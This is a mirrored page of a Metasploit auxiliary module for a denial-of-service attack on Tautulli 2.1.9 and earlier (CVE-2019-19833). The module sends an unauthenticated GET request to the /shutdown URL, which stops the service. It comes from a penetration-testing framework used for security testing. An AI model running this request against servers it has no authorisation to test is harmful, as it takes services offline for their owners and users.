CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
9
def initialize
10
super(
11
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
12
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
13
'Author' => 'Ismail Tasdelen',
14
'License' => MSF_LICENSE,
15
'References' => [
16
['CVE', '2019-19833'],
17
['EDB', '47785']
18
]
19
)
20
register_options([ Opt::RPORT(8181) ])
21
end
22
23
def run
24
res = send_request_raw({
25
'method' => 'GET',
26
'uri' => '/shutdown'
27
})
28
29
if res
30
print_status("Request sent to #{rhost}")
31
else
32
print_status("No reply from #{rhost}")
33
end
34
rescue Errno::ECONNRESET
35
print_status('Connection reset')
36
end
37
end
38
39